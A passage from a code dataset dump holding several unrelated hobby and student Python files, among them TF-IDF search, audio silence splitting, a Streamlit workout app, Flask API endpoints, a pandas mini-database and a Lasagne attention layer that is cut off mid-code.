string, then we transform them into a model vectorizer. We compare the similarity between the query and each document.\r\ntsquery = \" \".join(TotSputerms)\r\ntsquery_vect_counts = model_vect.transform([tsquery])\r\ntsquery_vect = model_tfidf.transform(tsquery_vect_counts)\r\nfrom sklearn.metrics.pairwise import cosine_similarity\r\ntssims = cosine_similarity(tsquery_vect, data_tfidf)\r\ntssims_sorted_idx = (-tssims).argsort()\r\n \r\n# In this section we show the top 5 most related articles to our query. \r\nprint(\"First article most fitting query: (%s)\" % (subtexts[tssims_sorted_idx[0,0]]))\r\nprint(\"Second article most fitting query: (%s)\" % (subtexts[tssims_sorted_idx[0,1]]))\r\nprint(\"Third article most fitting query: (%s)\" % (subtexts[tssims_sorted_idx[0,2]]))\r\nprint(\"Fourth article most fitting query: (%s)\" % (subtexts[tssims_sorted_idx[0,3]]))\r\nprint(\"Fifth article most fitting query: (%s)\" % (subtexts[tssims_sorted_idx[0,4]]))\r\n \r\n# Mini matrix showing cosine similarity between articles and the research question. This shows which article is the most likely to have the words from our query to answer the research question.\r\nprint(\"Shape of 2-D array similarity from query: (%i, %i)\" % (len(tssims), len(tssims[0,:])) )\r\ntsdf = pd.DataFrame(data=zip(tssims_sorted_idx[0,:], tssims[0,tssims_sorted_idx[0,:]]), columns=[\"Article Id\", \"Similarity in %\"])\r\ntsdf[0:10]\r\n","repo_name":"BA-ODS2019/PHM536","sub_path":"Portfolio 2 - eksamen.py","file_name":"Portfolio 2 - eksamen.py","file_ext":"py","file_size_in_byte":18279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"74165490311","text":"import functions as f\nimport info as i\n\ntry: # Extract the quiz code from the most recently downloaded file (soon to be only PDF captured) and then copied to clipboard (Linux only) \n recentPdf = f.findRecentFile(\".pdf\") #finds most recently modified file in current directory\n code = f.getCode(recentPdf)\n f.copyToClipboard(code, recentPdf)\nfinally:\n f.waitForTexFile(i.name, i.idNum)\n f.confirmChanges()","repo_name":"dnerever/latexQuizScript","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"31251172560","text":"import os\nimport re\n\nroute_n_result = os.popen('netstat -r').read()\n\nipv4_get = re.findall('(\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3})\\s+((UG)?)',route_n_result)[0]\n\nif ipv4_get:\n print('网关为:'+ipv4_get[0])\nelse:\n print('信息获取失败')","repo_name":"chenhu0818/chenhu","sub_path":"day_5_1.py","file_name":"day_5_1.py","file_ext":"py","file_size_in_byte":248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"1214562516","text":"import itertools\nimport pydub\nfrom pydub import AudioSegment\nfrom pydub.utils import db_to_float\nimport csv\nimport control\n\n\ndef detect_silence(audio_segment, min_silence_len, silence_thresh, seek_step):\n seg_len = len(audio_segment)\n\n # you can't have a silent portion of a sound that is longer than the sound\n if seg_len < min_silence_len:\n return []\n\n # convert silence threshold to a float value (so we can compare it to rms)\n silence_thresh = db_to_float(silence_thresh) * \\\n audio_segment.max_possible_amplitude\n print(\"silence_thresh: \", silence_thresh)\n\n # find silence and add start and end indicies to the to_cut list\n silence_starts = []\n\n # check successive (1 sec by default) chunk of sound for silence\n # try a chunk at every \"seek step\" (or every chunk for a seek step == 1)\n last_slice_start = seg_len - min_silence_len\n slice_starts = range(0, last_slice_start + 1, seek_step)\n\n # guarantee last_slice_start is included in the range\n # to make sure the last portion of the audio is seached\n if last_slice_start % seek_step:\n slice_starts = itertools.chain(slice_starts, [last_slice_start])\n\n for i in slice_starts:\n audio_slice = audio_segment[i:i + min_silence_len]\n if audio_slice.rms <= silence_thresh:\n silence_starts.append(i)\n\n # short circuit when there is no silence\n if not silence_starts:\n return []\n\n # combine the silence we detected into ranges (start ms - end ms)\n silent_ranges = []\n\n prev_i = silence_starts.pop(0)\n current_range_start = prev_i\n\n for silence_start_i in silence_starts:\n continuous = (silence_start_i == prev_i + seek_step)\n\n # sometimes two small blips are enough for one particular slice to be\n # non-silent, despite the silence all running together. Just combine\n # the two overlapping silent ranges.\n silence_has_gap = silence_start_i > (prev_i + min_silence_len)\n\n if not continuous and silence_has_gap:\n silent_ranges.append([current_range_start,\n prev_i + min_silence_len])\n current_range_start = silence_start_i\n prev_i = silence_start_i\n\n silent_ranges.append([current_range_start,\n prev_i + min_silence_len])\n\n return silent_ranges\n\n\ndef detect_nonsilent(audio_segment, min_silence_len, silence_thresh, seek_step):\n silent_ranges = detect_silence(\n audio_segment, min_silence_len, silence_thresh, seek_step)\n len_seg = len(audio_segment)\n\n # if there is no silence, the whole thing is nonsilent\n if not silent_ranges:\n return [[0, len_seg]]\n\n # short circuit when the whole audio segment is silent\n if silent_ranges[0][0] == 0 and silent_ranges[0][1] == len_seg:\n return []\n\n print(\"silent_ranges in detect_nonsilent: \", silent_ranges)\n prev_end_i = 0\n nonsilent_ranges = []\n for start_i, end_i in silent_ranges:\n nonsilent_ranges.append([prev_end_i, start_i])\n prev_end_i = end_i\n\n if end_i != len_seg:\n nonsilent_ranges.append([prev_end_i, len_seg])\n\n if nonsilent_ranges[0] == [0, 0]:\n nonsilent_ranges.pop(0)\n\n print(\"nonsilent_ranges in detect_nonsilent method\", nonsilent_ranges)\n print(\"nonsilent_ranges in detect_nonsilent array size\", len(nonsilent_ranges))\n return nonsilent_ranges\n\n\ndef split_on_silence(audio_segment, min_silence_len, silence_thresh, keep_silence, seek_step):\n \"\"\"\n audio_segment - original pydub.AudioSegment() object\n min_silence_len - (in ms) minimum length of a silence to be used for\n a split. default: 1000ms\n silence_thresh - (in dBFS) anything quieter than this will be\n considered silence. default: -16dBFS\n keep_silence - (in ms) amount of silence to leave at the beginning\n and end of the chunks. Keeps the sound from sounding like it is\n abruptly cut off.\n \"\"\"\n\n not_silence_ranges = detect_nonsilent(\n audio_segment, min_silence_len, silence_thresh, seek_step)\n\n chunks = []\n for start_i, end_i in not_silence_ranges:\n start_i = max(0, start_i - keep_silence)\n end_i += keep_silence\n\n chunks.append(audio_segment[start_i:end_i])\n\n return chunks\n\n\nsound_file = AudioSegment.from_wav(\n r\"/home/kha/Documents/text-to-speech/Result-Audiobook/convertedrate.wav\")\naudio_chunks = split_on_silence(sound_file,\n # must be silent for at least half a second\n min_silence_len=50,\n\n # consider it silent if quieter than -16 dBFS\n silence_thresh=-23,\n keep_silence=100,\n seek_step=1\n )\n\nprint(\"Number of audio chunks produced from the given audio: \", len(audio_chunks))\n\nsilence_from_audio = detect_silence(\n sound_file, min_silence_len=50, silence_thresh=-23, seek_step=1)\ntotal_audio_time = 0\n\nheader_row = [\"\"]\nchunks_peak_amp_row = [\"Amplitude(Peak)\"]\nchunks_peak_amp_row_db = [\"Amplitude(dB)\"]\nchunks_peak_amp_row_dBFS = [\"Amplitude(dBFS)\"]\nchunks_time_duration = [\"Time duration\"]\nchunks_frame_count = [\"Frame Count\"]\n\nfor i, chunk in enumerate(audio_chunks):\n header_row.append(\"chunk\"+str(i+1))\n\nprint(\"header_row: \", header_row)\n\nwith open('Results.csv', 'w') as csvFile:\n writer = csv.writer(csvFile)\n writer.writerow(header_row)\n\n for i, chunk in enumerate(audio_chunks):\n out_file = \"/home/kha/Documents/text-to-speech/Result-Audiobook/Split-data/split{0}.wav\".format(\n i)\n print(\"exporting\", out_file)\n chunk.export(out_file, format=\"wav\")\n\n ##Peak Amplitude of each audio chunk\n chunks_peak_amp_row.append(chunk.max)\n chunks_peak_amp_row_db.append(control.mag2db(chunk.max))\n chunks_peak_amp_row_dBFS.append(chunk.max_dBFS)\n\n ##Time duration of each audio chunk\n chunks_time_duration.append(str(chunk.duration_seconds)+\" sec\")\n\n ##Frame count of each audio chunk\n chunks_frame_count.append(chunk.frame_count(ms=None))\n\n ##Total sum of audio lengths of all audio chunks\n total_audio_time = total_audio_time + chunk.duration_seconds\n\n writer.writerow(chunks_peak_amp_row)\n writer.writerow(chunks_peak_amp_row_db)\n writer.writerow(chunks_peak_amp_row_dBFS)\n writer.writerow(chunks_time_duration)\n writer.writerow(chunks_frame_count)\n writer.writerow([\"Total audio output time\", total_audio_time])\n csvFile.close()\n\nprint(total_audio_time, \"seconds\")\n","repo_name":"Van-Hoang-Kha/Designing-a-PDF-Audiobook-and-Audio-Processing-Remove-Silence-using-Python","sub_path":"Audio-Processing/Split-Audio/split.py","file_name":"split.py","file_ext":"py","file_size_in_byte":6643,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"15424250795","text":"import altair as alt\nimport numpy as np\nimport pandas as pd\nimport streamlit as st\nimport os\nimport re\nimport sqlite3\nimport datetime\nimport json\n\n\ndef main():\n st.set_page_config(layout=\"wide\")\n \n # Load silver SQLite database\n PATH = './data/silver/'\n con = sqlite3.connect(f\"{PATH}silver.sqlite\")\n\n workout_names = get_workout_names(con)\n col1, _, col2 = st.columns((1, 0.2, 1))\n\n with st.sidebar:\n st.write('# Select a workout')\n workout_name = st.radio('', workout_names)\n st.button(\"Add new\")\n\n last_workout_str, df_last_workout = get_last_workout(workout_name, con)\n last_workout_date = datetime.datetime.strptime(last_workout_str, \"%Y-%m-%d %H:%M:%S\")\n last_workout_date = last_workout_date.date()\n\n col1.write(\"# \" + workout_name.replace(\"_\", \" \"))\n col1.write(\"Latest workout\")\n \n col1.write(last_workout_date)\n weight_to_lift = col1.number_input(\"Weight\", min_value=0, value=int(df_last_workout[0][1]), key=workout_name[0] + 'weight')\n reps = col1.number_input('Reps', min_value=0, value=int(df_last_workout[0][2]), key=workout_name[0])\n col1.button(\"Add set\")\n col1.button(\"Reset to previous workout\")\n\n\n barbell_weight_allocation = col2.empty()\n barbell_weight_edit = col2.empty()\n weight_set_full = {20.0: 2, 10.0: 2, 5.0: 2, 2.5: 2, 1.0: 2, 0.75: 2, 0.5: 2, 0.25:2}\n\n with barbell_weight_edit.expander(\"Edit weight set\"):\n weight_bar = st.number_input(\"Weight of bar\", min_value=0, value=16)\n st.write(\"###### Plates\")\n for weight, number in weight_set_full.items():\n number = st.number_input(str(weight)+\" kg\", min_value=0, value=number)\n\n weight_set_to_use_full, weight_unallocated = calculate_barbell_weights(weight_to_lift, weight_set_full, weight_bar)\n df_barbell_weight_allocation = show_barbell_weight_allocation(weight_set_to_use_full)\n\n\n if weight_unallocated != 0:\n col2.write(f\"Unallocated {str(weight_unallocated)}\")\n\n\n\n chart = alt.Chart(df_barbell_weight_allocation).mark_bar().encode(\n x=alt.X('Plate:N', sort=df_barbell_weight_allocation['Plate'].to_list(), axis=alt.Axis(labelAngle=0), title='Barbell weight allocation'),\n y=alt.Y('Weight:Q', axis=None),\n tooltip=['Weight']\n ).configure_axis(\n grid=False\n ).configure_view(\n strokeWidth=0\n )\n\n\n barbell_weight_allocation.altair_chart(chart, use_container_width=True)\n\n\n con.close()\n\n\n #df_weights = weight_allocate_test(weight_set_full, weight_bar)\n #st.dataframe(df_weights.style.apply(highlight_unallocated, axis=1))\n\ndef calculate_barbell_weights(weight_to_lift, weight_set_full, weight_bar):\n \n weight_to_allocate = weight_to_lift - weight_bar\n if weight_to_allocate < 0:\n return {}, weight_to_allocate\n\n # Halve weight set because of two sides for barbell\n weight_set_half = {key: value//2 for key, value in weight_set_full.items()}\n weight_set_to_use_half, weight_unallocated = allocate_weights(weight_to_allocate/2, weight_set_half)\n\n # Double weight set for total weight\n return {key: value * 2 for key, value in weight_set_to_use_half.items()}, weight_unallocated * 2\n\ndef allocate_weights(weight_to_allocate, weight_set_full):\n\n weight_set = {}\n for weight, number in sorted(weight_set_full.items(), reverse=True):\n weight_set[weight] = 0\n\n if (weight_to_allocate >= weight) and number > 0:\n weight_set[weight] = min((weight_to_allocate // weight), number)\n weight_to_allocate -= min((weight_to_allocate // weight), number) * weight\n\n weight_unallocated = weight_to_allocate\n return weight_set, weight_unallocated\n\ndef total_weight(weight_set, weight_bar):\n total_weight = weight_bar\n for weight, number in weight_set.items():\n total_weight += weight * number\n return total_weight\n\ndef weight_allocate_test(weight_set_full, weight_bar):\n\n df_weights = pd.DataFrame()\n for i in range(15, 100):\n weight_set, weight_unallocated = calculate_barbell_weights(i, weight_set_full, weight_bar)\n weight_set['Barbell'] = weight_bar\n weight_set['Total weight'] = i\n weight_set['Unallocated'] = weight_unallocated\n\n df_weights = pd.concat([df_weights, weight_set], ignore_index=True)\n return df_weights\n\ndef highlight_unallocated(s):\n return ['background-color: red']*len(s) if s.Unallocated else ['background-color: white']*len(s)\n\ndef get_last_workout(workout_name, con):\n cur = con.cursor()\n\n # Get last date of particular workout\n query = \"SELECT Dates.WorkoutID, MAX(Date) \\\n FROM Workout_Set \\\n LEFT JOIN Dates \\\n ON Workout_Set.SetID = Dates.SetID \\\n WHERE Workout_Name=:workout_name\"\n\n cur.execute(query, {'workout_name': workout_name})\n temp = cur.fetchall()\n last_workoutID = temp[0][0]\n last_workout_date = temp[0][1]\n\n # Get details of latest workout\n query = \"SELECT Workout_Name, Weight, Reps \\\n FROM Workout_Set \\\n LEFT JOIN Dates \\\n ON Workout_Set.SetID = Dates.SetID \\\n WHERE WorkoutID=:workoutID \\\n AND Workout_Name=:workout_name\"\n\n cur.execute(query, {'workoutID': last_workoutID, 'workout_name': workout_name})\n\n return last_workout_date, cur.fetchall()\n\ndef get_workout_names(con):\n cursor = con.cursor()\n cursor.execute(\"SELECT DISTINCT(Workout_Name) FROM Workout_Set\")\n workout_names = cursor.fetchall()\n # Flatten nested list\n return [element for sublist in workout_names for element in sublist]\n\ndef show_barbell_weight_allocation(weight_set_to_use_full):\n\n df_barbell_weight_allocation = pd.DataFrame({\"Plate\":[],\n \"Weight\":[]})\n\n # One half of barbell\n for weight, number in weight_set_to_use_full.items():\n if number > 0:\n df_temp = pd.DataFrame({\"Plate\":[weight],\n \"Weight\":[weight]})\n df_barbell_weight_allocation = pd.concat([df_barbell_weight_allocation, df_temp], ignore_index=True)\n \n # Other half\n df_temp = df_barbell_weight_allocation.sort_values(by=[\"Plate\"])\n df_temp[\"Plate\"] = -df_temp[\"Plate\"]\n df_temp[\"Plate\"] = df_temp[\"Plate\"].astype(str)\n df_barbell_weight_allocation[\"Plate\"] = df_barbell_weight_allocation[\"Plate\"].astype(str)\n\n # Bar\n barbell = pd.DataFrame({\"Plate\":[\"bar\"],\n \"Weight\":[16]})\n\n df_temp = pd.concat([df_temp, barbell], ignore_index=True)\n df_barbell_weight_allocation = pd.concat([df_temp, df_barbell_weight_allocation], ignore_index=True)\n\n return df_barbell_weight_allocation\n\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"alaistair/getting-stronger","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":6744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"33039893439","text":"import numpy as np\nimport matplotlib.pylab as plt\n\n\nx0 = 10\nv0 = 0\ng = 9.81\ntmax = 10\ndt = 0.01\n\nn = int(tmax/dt)\ndth = dt/2\n\nt = np.zeros(n)\nx = np.zeros(n)\nv = np.zeros(n)\na = np.zeros(n)\n\nx[0] = x0\nv[0] = v0\na[0] = g\nt[0] = 0\n\n\nfor i in range(n-1):\n t[i + 1] = t[i] + dt\n a[i + 1] = x[0]/(2*t[i]**2)\n v[i + 1] = v[i] - a[i]*dt\n x[i + 1] = x[i] + v[i]*dt\n\n i += 1\n\n\n\nplt.plot(t,a, \"r\", label=\"acceleration\")\nplt.subplot(3,1,1)\nplt.plot(t,v, \"y\", label=\"velocity\")\nplt.subplot(3,1,2)\nplt.plot(t,x, \"b\", label=\"position\")\nplt.subplot(3,1,3)\n\nplt.legend()\nplt.show()\n","repo_name":"SimonkgB/SCHOOL","sub_path":"PROGRAMMERING/UNDERVISNING/SEMESTER1/FYS1100/OPPGAVER/integrere.py","file_name":"integrere.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"11586263709","text":"from flask_restplus import Resource, abort\n\nfrom predictormanagerservice.api.v2.business import create_predictor, get_predictor, get_predictors, \\\nupdate_predictor_attributes, delete_predictor\nfrom predictormanagerservice.api.namespaces import predictors_namespace as api\nfrom predictormanagerservice.api.v2.serializers import create_fields, update_fields\nfrom predictormanagerservice.api.v2.parsers import error_response_body, error_response_body_500, PredictorParser\n\n\n@api.route('/predictors')\nclass PredictorCollection(Resource):\n @api.response(202, 'Accepted')\n @api.response(400, 'Bad Request', error_response_body)\n @api.response(403, 'Unauthorized')\n @api.response(415, 'Invalid Data Format')\n @api.response(500, 'Unexpected Error: The Predictor was not created', error_response_body_500)\n @api.expect(create_fields)\n def post(self):\n \"\"\"\n Deploy a model\n\n * Send a JSON object with values for the following items in the request body.\n\n ```\n {\n \"predictorName\": \"Predict1\",\n \"description\":\"This is a test.\",\n }\n ```\n \"\"\"\n return create_predictor()\n\n\n @api.response(200, 'Predictor successfully retrieved')\n @api.response(400, 'Bad Request', error_response_body)\n @api.response(404, 'Invalid Key')\n @api.response(500, 'Unexpected Error', error_response_body_500)\n\n def get(self):\n \"\"\"\n Returns all predictors in the system that the user is authorized to access.\n \"\"\"\n return get_predictors()\n\n\n@api.route('/predictors/')\n@api.response(500, 'Unexpected Error')\nclass PredictorItem(Resource):\n @api.response(204, 'No Content')\n def delete(self, predictorKey):\n \"\"\"\n Delete Model with modelKey\n \"\"\"\n return delete_predictor(predictorKey)\n\n @api.response(200, 'Predictor successfully retrieved')\n @api.response(400, 'Bad Request')\n @api.response(401, 'Not Authorized')\n @api.response(403, 'Forbidden')\n @api.response(404, 'Invalid Key')\n @api.response(500, 'Unexpected Error')\n def get(self, predictorKey):\n \"\"\"\n Retrieves Predictor with predictorlKey\n \"\"\"\n return get_predictor(predictorKey)\n\n\n@api.route('/predictors//attributes')\n@api.response(500, 'Unexpected Error')\nclass PredictorAttributesResource(Resource):\n @api.response(200, 'OK')\n @api.response(400, 'Bad Request')\n @api.response(404, 'Not Found')\n def put(self, predictorKey):\n \"\"\"\n Update Predictor attributes for the model using the specified predictor key\n \"\"\"\n return update_predictor_attributes(predictorKey)\n","repo_name":"acumos/model-deployments-predictor-management","sub_path":"predictormanagerservice/api/v2/endpoints.py","file_name":"endpoints.py","file_ext":"py","file_size_in_byte":2691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"36418519984","text":"import numpy as np\nfrom . import database\nfrom . import preprocessor\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.tree import DecisionTreeRegressor\n\nnormalization = [\"MinMaxScaler_\", \"Standard_Scaler\", \"PolynomialFeaturesScaler\"]\n\n\ndef normalize(X, norm):\n \"\"\"\n chose a preproccessing method to apply to the data\n\n Parameters:\n\n X : np.ndarray\n The data to normalize\n\n norm : int\n The index of normalization list to know which preprocessing method to use.\n\n Returns:\n numpy.ndarray,\n a 2D array same shape as the input but normalized.\n\n \"\"\"\n\n degree = 2\n if norm == 2:\n normalization_to_call = getattr(preprocessor, normalization[2])\n normalized_set = normalization_to_call(X, scale=\"minmax\", degree=degree)\n elif norm == 3:\n normalization_to_call = getattr(preprocessor, normalization[2])\n normalized_set = normalization_to_call(X, scale=\"z-norm\", degree=degree)\n else:\n normalization_to_call = getattr(preprocessor, normalization[norm])\n normalized_set = normalization_to_call(X)\n return normalized_set\n\n\ndef regression(data, norm, model):\n \"\"\"\n apply the regression model to the data with a specific normalization method as preprocessing\n\n Parameters:\n\n data : int\n The index of data_base list to know which data to load.\n\n norm : int\n The index of normalization list to know which preprocessing method to use.\n\n model : string\n Which regression model to apply.\n\n Returns: \n list of np.array,\n A list of the values of the predicted attribute for every protocol.\n \n list of np.array,\n A list of the true values of the test set to compare with the prediction.\n\n \"\"\"\n\n y_predicted = []\n y_tested = []\n\n for i in range(len(database.seeds)):\n training_set = database.extract(data, i, 0)\n testing_set = database.extract(data, i, 1)\n normalized_train = normalize(training_set, norm)\n normalized_test = normalize(testing_set, norm)\n\n y_train = normalized_train[:, -1]\n y_test = normalized_test[:, -1]\n\n if model == \"LinearRegression\":\n regressor = LinearRegression()\n if model == \"Regressiontree\":\n regressor = DecisionTreeRegressor()\n\n regressor.fit(normalized_train, y_train)\n y_predict = regressor.predict(normalized_test)\n y_tested.append(y_test)\n y_predicted.append(y_predict)\n\n return y_tested, y_predicted\n # return for the 3 seeds","repo_name":"imenbenmhd/MiniProject","sub_path":"tgibm/algorithm.py","file_name":"algorithm.py","file_ext":"py","file_size_in_byte":2610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"724839865","text":"import copy\nimport os.path\nfrom dataclasses import dataclass, field\nfrom datetime import datetime\nimport json\n\nimport pandas\nimport pandas as pd\nimport numpy as np\nfrom pandas import DataFrame\n\n\n# to do look whats terality https://ibexorigin.medium.com/good-bye-pandas-meet-terality-its-evil-twin-with-identical-syntax-455b42f33a6d\n\n\n@dataclass\nclass DatabaseLog:\n log: DataFrame = field(init=False)\n\n def __post_init__(self):\n log_data = {\"action\": [\"init\"], \"info\": [\"init log entry\"], \"time\": [datetime.now()]}\n self.log = DataFrame(data=log_data)\n\n def add_log_entry(self, function_ref, info=\"\"):\n function_name = function_ref.__name__\n log_length = len(self.log)\n log_data = {\"action\": function_name, \"info\": info, \"time\": datetime.now()}\n self.log.loc[log_length] = log_data\n\n\n@dataclass\nclass Table:\n name: str\n df: DataFrame\n primary_keys: tuple\n is_unique: bool = False\n dtypes: dict = None\n primary_key: str = field(init=False)\n\n def __post_init__(self):\n self.primary_key = \"\"\n for i in range(0, len(self.primary_keys)):\n self.primary_key += str(self.primary_keys[i])\n if i < len(self.primary_keys)-1:\n self.primary_key += \":\"\n # if self.dtypes is None:\n # self.dtypes = list()\n # for t in df.dtypes:\n # self.dtypes.append(str(t))\n\n def check_uniqueness(self, data : dict):\n new_dict = dict()\n partial_table = None\n for key in self.primary_keys:\n if partial_table is None:\n #idx = np.where((self.df[key] == data[key]))\n idx = self.df[key] == data[key]\n partial_table = self.df.loc[idx]\n else:\n partial_table = partial_table.loc[partial_table[key] == data[key]]\n if partial_table is not None and len(partial_table) > 0:\n return False\n else:\n return True\n@dataclass\nclass Database:\n name: str\n persistent_path: str\n # values are pandas dataframes\n tables: dict = field(init=False)\n log: DatabaseLog = field(init=False)\n datetime_created: datetime = field(init=False)\n datetime_last_change: datetime = field(init=False)\n\n def action(self, name, paras):\n pass\n\n def add_table(self, name, columns, primary_keys: tuple, is_unique=False, dtypes=None):\n columns_dict = {}\n for column in columns:\n columns_dict[column] = []\n if dtypes is None:\n table_pd = DataFrame(data=columns_dict)\n self.tables[name] = Table(name, table_pd, primary_keys=primary_keys, is_unique=is_unique)\n else:\n dtypes_list = list()\n for k, v in dtypes.items():\n dtypes_list.append((k, v))\n dtypes_list = np.dtype(dtypes_list)\n empty_data = np.empty(0, dtype=dtypes_list)\n table_pd = DataFrame(empty_data)\n self.tables[name] = Table(name, table_pd, primary_keys=primary_keys, is_unique=is_unique, dtypes=dtypes)\n\n def add_row(self, table_name, data):\n\n table = self.tables[table_name]\n df = table.df\n df_length = len(df)\n index_of_new_row = df_length\n\n if isinstance(data, pd.DataFrame):\n self.tables[table_name] = self.tables[table_name].append(data)\n elif isinstance(data, list):\n # new_row = pd.Series(data=data, index=self.tables[table_name].columns)\n # self.tables[table_name] = self.tables[table_name].append(new_row, ignore_index=True)\n df.loc[df_length] = data\n elif isinstance(data, dict):\n #idx = np.where((df['Salary_in_1000'] >= 100) & (df['Age'] < 60) & (df['FT_Team'].str.startswith('S')))\n # new_row = pd.Series(data, index=self.tables[table_name].columns)\n # self.tables[table_name] = self.tables[table_name].append(new_row, ignore_index=True)\n df.loc[df_length] = data\n else:\n print(\"Not implemented, operation failed\")\n self.log.add_log_entry(self.add_row, \"table: \" + table_name + \", row_index: \" + str(index_of_new_row))\n\n def update_row(self, table_name : str, data: dict, index=None, condition=None):\n table = self.tables[table_name]\n df_table = table.df\n if index is not None:\n for key, value in data.items():\n df_table.at[index, key] = value\n self.log.add_log_entry(self.update_row, \"table: \" + table_name + \", row_index: \" + str(index))\n elif condition is not None:\n #https://stackoverflow.com/questions/36909977/update-row-values-where-certain-condition-is-met-in-pandas\n print(\"TO DO\")\n\n else:\n partial_table = None\n for key in table.primary_keys:\n if partial_table is None:\n # idx = np.where((self.df[key] == data[key]))\n idx = df_table[key] == data[key]\n partial_table = df_table.loc[idx]\n else:\n idx = partial_table[key] == data[key]\n partial_table = partial_table.loc[idx]\n print(partial_table)\n print(partial_table.index)\n df_table.loc[int(partial_table.index[0])] = list(data.values())\n\n\n def __post_init__(self):\n self.tables = {}\n self.datetime_created = datetime.now()\n self.datetime_last_change = self.datetime_created\n self.log = DatabaseLog()\n\n def save_as_csv(self, alt_path=None):\n table_info = dict()\n database_dir_path = self.persistent_path + \"/\" + self.name\n path_to_save = self.persistent_path if alt_path is None else alt_path\n table_dir = database_dir_path + \"/tables\"\n log_dir = database_dir_path + \"/log\"\n if not os.path.exists(path_to_save):\n os.mkdir(path_to_save)\n if not os.path.exists(database_dir_path):\n os.mkdir(database_dir_path)\n if not os.path.exists(table_dir):\n os.mkdir(table_dir)\n if not os.path.exists(log_dir):\n os.mkdir(log_dir)\n for key in self.tables.keys():\n table = self.tables[key]\n\n path_of_table = table_dir + \"/\" + key + \".csv\"\n table.df.to_csv(path_of_table)\n\n info_dict = dict()\n dtypes_dict = dict()\n if table.dtypes is None:\n for k, v in table.df.dtypes.items():\n dtypes_dict[k] = str(v)\n else:\n for k, v in table.dtypes.items():\n dtypes_dict[k] = str(v)\n info_dict[\"dtypes\"] = dtypes_dict\n info_dict[\"primary_keys\"] = table.primary_keys\n info_dict[\"is_unique\"] = table.is_unique\n with open(table_dir + \"/\" + key + \".json\", 'w') as f:\n json.dump(info_dict, f)\n self.log.log.to_csv(log_dir + \"/log.csv\")\n\n @staticmethod\n def load_from_csv(path, database_name):\n from datetime import datetime\n db = Database(database_name, path)\n database_dir_path = db.persistent_path + \"/\" + db.name\n table_dir = database_dir_path + \"/tables\"\n log_dir = database_dir_path + \"/log\"\n tables = os.listdir(table_dir)\n for table in tables:\n if \".csv\" in table:\n table_name = table.split(\".csv\")[0]\n\n with open(table_dir + \"/\" + table_name + \".json\") as f:\n my_dict = json.load(f)\n dtypes = my_dict[\"dtypes\"]\n dtypes_2 = copy.deepcopy(dtypes)\n parse_dates = list()\n for k, v in dtypes.items():\n if \"datetime\" in v:\n parse_dates.append(k)\n del dtypes_2[k]\n\n table_pd = pandas.read_csv(table_dir + \"/\" + table, index_col=[0], dtype=dtypes_2, parse_dates=parse_dates)\n db.tables[table_name] = Table(table_name, table_pd, my_dict[\"primary_keys\"], is_unique=my_dict[\"is_unique\"], dtypes=dtypes)\n log = pandas.read_csv(log_dir + \"/log.csv\",index_col=[0], parse_dates=[\"time\"])\n\n db.log.log = log\n db.datetime_created = db.log.log.iloc[0]['time'].to_pydatetime()\n db.log.add_log_entry(Database.load_from_csv, \"loaded from \" + database_dir_path)\n return db\n","repo_name":"pixelbusiness/ms_data","sub_path":"database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":8412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"9987319641","text":"import random\n\ndef dan():\n return random.choice([0, 1])\n\n\ndef ana():\n return random.choice([0, 0, 0, 1, 1, 1, 1, 1, 1, 1])\n\nana_won = 0\nfor i in range(1, 10000):\n count_ana = 0\n count_dan = 0\n while(count_ana < 25):\n ana()\n if ana() == 1:\n count_ana += 1\n else:\n count_dan += 1\n dan()\n if dan() == 1:\n count_dan += 1\n else:\n count_ana+= 1\n if count_ana == 25 and count_dan < 25:\n ana_won += 1\n\nprint(\"prob: \", ana_won/10000)","repo_name":"CristianProdius/Mathematics-Laboratories","sub_path":"lab1/PSA/Tennis.py","file_name":"Tennis.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"73142106287","text":"\"\"\"\nThe AttentionLayer implements attention mechanism, as in\nSoren Kaae Sonderby, Casper Kaae Sonderby, Henrik Nielsen, Ole Winther,\nConvolutional LSTM Networks for Subcellular Localization of Proteins, 2015,\nhttps://arxiv.org/abs/1503.01919\n\n\"\"\"\n\nimport numpy as np\nimport theano.tensor as T\nfrom lasagne import nonlinearities\nfrom lasagne import init\n\nfrom lasagne.layers import MergeLayer\n\n__all__ = [\n \"AttentionLayer\"\n]\n\n\nclass AttentionLayer(MergeLayer):\n def __init__(self, incoming, num_units, mask_input=None, W=init.GlorotUniform(),\n v=init.GlorotUniform(), b=init.Constant(0.), num_att_layers=1, nonlinearity=nonlinearities.tanh,\n **kwargs):\n\n incomings = [incoming]\n self.mask_incoming_index = -1\n if mask_input is not None:\n incomings.append(mask_input)\n self.mask_incoming_index = 1\n\n super(AttentionLayer, self).__init__(incomings, **kwargs)\n self.nonlinearity = (nonlinearities.identity if nonlinearity is None else nonlinearity)\n\n self.num_units = num_units\n self.num_att_layers = num_att_layers\n\n input_shape = self.input_shapes[0]\n num_inputs = int(np.prod(input_shape[2:]))\n\n self.W = [self.add_param(W, (num_inputs, num_units), name='W') for _ in range(self.num_att_layers)]\n self.v = self.add_param(v, (num_units, 1), name='v')\n self.b = [self.add_param(b, (num_units,), name='b', regularizable=False) for _ in range(self.num_att_layers)]\n\n def get_output_shape_for(self, input_shapes):\n input_shape = input_shapes[0]\n return input_shape[0], input_shape[2]\n\n def 